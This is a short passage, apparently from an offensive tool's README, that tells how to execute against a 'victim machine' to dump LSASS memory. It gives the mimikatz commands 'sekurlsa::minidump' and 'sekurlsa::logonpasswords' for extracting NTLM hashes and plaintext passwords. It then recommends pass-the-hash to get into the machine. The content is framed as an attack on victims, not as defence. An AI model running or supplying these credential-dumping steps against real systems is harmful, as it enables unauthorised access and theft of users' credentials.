Youtube Video example: https://youtu.be/9Y67T9bIPQY
Usage
And now we execute into victim machine:
Now let's read this dump with mimikatz: Mimikatz shell:
sekurlsa::minidump C:\Users\Public\Music\lsass.dmp
sekurlsa::logonpasswords
And we have the NTLM and we can enter the machine using Pass The Hash Tecnique, and if the user account will not be a Microsoft Account we can see the Password!